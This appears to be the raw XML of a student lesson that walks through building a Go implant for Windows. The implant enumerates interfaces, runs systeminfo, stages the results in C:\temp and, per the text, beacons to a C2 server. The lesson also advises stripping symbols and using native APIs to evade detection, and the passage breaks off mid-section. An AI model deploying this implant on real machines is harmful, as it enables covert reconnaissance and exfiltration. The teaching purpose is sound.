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60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Cybersecurity Final Year Project</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Go Payload Series — Lesson 01 / Version 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E6DA4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">net_scan.go — Basic Recon, File Write &amp; C2 Beacon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="360"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the first functional version of our Go payload. By the end of this lesson you will understand how Go programs are structured, how to run system commands from within Go code, how to write output to disk, and how to send that data to a remote C2 server over HTTP. All subsequent versions build on top of what is introduced here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This version performs a single recon run — it does not loop, does not persist, and does not obfuscate itself. It is intentionally minimal so that each concept can be isolated and understood before complexity is added.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"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12"/>
              <w:bottom w:val="single" w:color="2E6DA4" w:sz="4"/>
              <w:right w:val="single" w:color="2E6DA4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8F0FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">MITRE ATT&amp;CK Techniques</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1082 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">System Information Discovery — systeminfo command enumerates OS version, hotfixes, hostname, domain, and hardware specs.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1016 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">System Network Configuration Discovery — net.Interfaces() enumerates network adapters, IPs and MACs without touching the command line.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1041 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Exfiltration Over C2 Channel — Recon output is sent via HTTP POST to a Flask listener.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">T1074.001 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Local Data Staging — Data is written to C:\temp\ before exfil — a staging artefact detectable by forensics.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Build Instructions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Install the Go toolchain from golang.org. The key feature used for offensive tooling is cross-compilation: you can build a Windows .exe from a Linux or macOS machine using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2"/>
              <w:left w:val="single" w:color="555555" w:sz="2"/>
              <w:bottom w:val="single" w:color="555555" w:sz="2"/>
              <w:right w:val="single" w:color="555555" w:sz="2"/>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 Build for Windows x64 from any OS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GOOS=windows GOARCH=amd64 go build -o net_scan_v1.exe net_scan.go</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Build and strip debug symbols (reduces size, hinders analysis)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" -o net_scan_v1.exe net_scan.go</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The resulting .exe is a fully static binary. It has zero external runtime dependencies — no Python, no .NET, no DLLs required on the target machine. This is the primary reason Go is used for implant development.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E6DA4" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Code Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Package Imports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Every Go file starts with a package declaration and an import block. All imports used in this file must be explicitly listed — the compiler will error if an import is unused.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2"/>
              <w:left w:val="single" w:color="555555" w:sz="2"/>
              <w:bottom w:val="single" w:color="555555" w:sz="2"/>
              <w:right w:val="single" w:color="555555" w:sz="2"/>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import (</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "bytes"    // bytes.NewReader — wraps raw bytes for the HTTP request body</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "fmt"      // fmt.Sprintf / fmt.Printf — formatted string construction</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "io"       // io.ReadAll — reads the HTTP response body</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "net"      // net.Interfaces() — native Go NIC enumeration</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "net/http" // http.NewRequest, http.Client — outbound HTTP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "os"       // os.MkdirAll, os.WriteFile, os.ReadFile, os.Hostname</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "os/exec"  // exec.Command — shells out to cmd.exe</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    "time"     // time.Now(), time.Duration — timestamps and timeouts</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 The main() Function</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Go programs always begin execution in main(). There is no class, no setup boilerplate. Everything in this version happens sequentially inside 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2"/>
              <w:left w:val="single" w:color="555555" w:sz="2"/>
              <w:bottom w:val="single" w:color="555555" w:sz="2"/>
              <w:right w:val="single" w:color="555555" w:sz="2"/>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func main() {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    os.MkdirAll(`C:\temp`, 0755)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    timestamp := time.Now().Format("2006-01-02 15:04:05")</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    var content string</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">os.MkdirAll creates the C:\temp directory if it does not already exist. The 0755 is a Unix permission mask — on Windows it is largely ignored but must still be supplied. The backtick string literal avoids having to escape the backslashes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Go's time.Format uses a reference time instead of strftime-style format codes. The magic date 2006-01-02 15:04:05 maps to year-month-day hour:minute:second. This is a Go idiom worth remembering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Network Interface Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This section uses Go's standard net package — no shell commands involved. This is important: calling a native Go API leaves no cmd.exe process in the Windows process tree, which is harder to detect than spawning a child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2"/>
              <w:left w:val="single" w:color="555555" w:sz="2"/>
              <w:bottom w:val="single" w:color="555555" w:sz="2"/>
              <w:right w:val="single" w:color="555555" w:sz="2"/>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interfaces, _ := net.Interfaces()</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">for _, i := range interfaces {</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    addrs, _ := i.Addrs()</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    content += fmt.Sprintf("Interface: %s (%v)\n", i.Name, addrs)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">net.Interfaces() returns a slice of net.Interface structs. Each struct has a Name field (e.g. "Ethernet", "Wi-Fi") and an Addrs() method that returns all bound IP addresses. The underscore _ discards the error return — acceptable here for a demo but production code should handle errors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker value: NIC names and IPs reveal whether the target is dual-homed (connected to two networks), has a VPN adapter active, or is on a known subnet range that indicates the network topology.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 System Information via systeminfo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Here we shell out to Windows using os/exec. Unlike the net package approach above, this spawns a child process — visible in the process tree and logged by Sysmon EventID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2"/>
              <w:left w:val="single" w:color="555555" w:sz="2"/>
              <w:bottom w:val="single" w:color="555555" w:sz="2"/>
              <w:right w:val="single" w:color="555555" w:sz="2"/>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cmd := exec.Command("cmd", "/C", "systeminfo")</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">output, _ := cmd.Output()</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">content += string(output) + "\n\n"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">exec.Command takes the executable name and its arguments as separate strings. The /C flag tells cmd.exe to run the following command and then exit. cmd.Output() blocks until the process completes and returns stdout as a byte slice. We convert it to a string with string(output).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">systeminfo returns: OS name and version, build number, hotfixes installed, domain membership, hostname, registered owner, BIOS version, and total physical memory. For an attacker this is a goldmine — hotfix list reveals unpatched vulnerabilities, domain membership indicates an AD environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 Writing the Report to Disk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2"/>
              <w:left w:val="single" w:color="555555" w:sz="2"/>
              <w:bottom w:val="single" w:color="555555" w:sz="2"/>
              <w:right w:val="single" w:color="555555" w:sz="2"/>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path := `C:\temp\recon_combined.txt`</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="D4D4D4"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">os.WriteFile(path, []byte(content), 0644)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
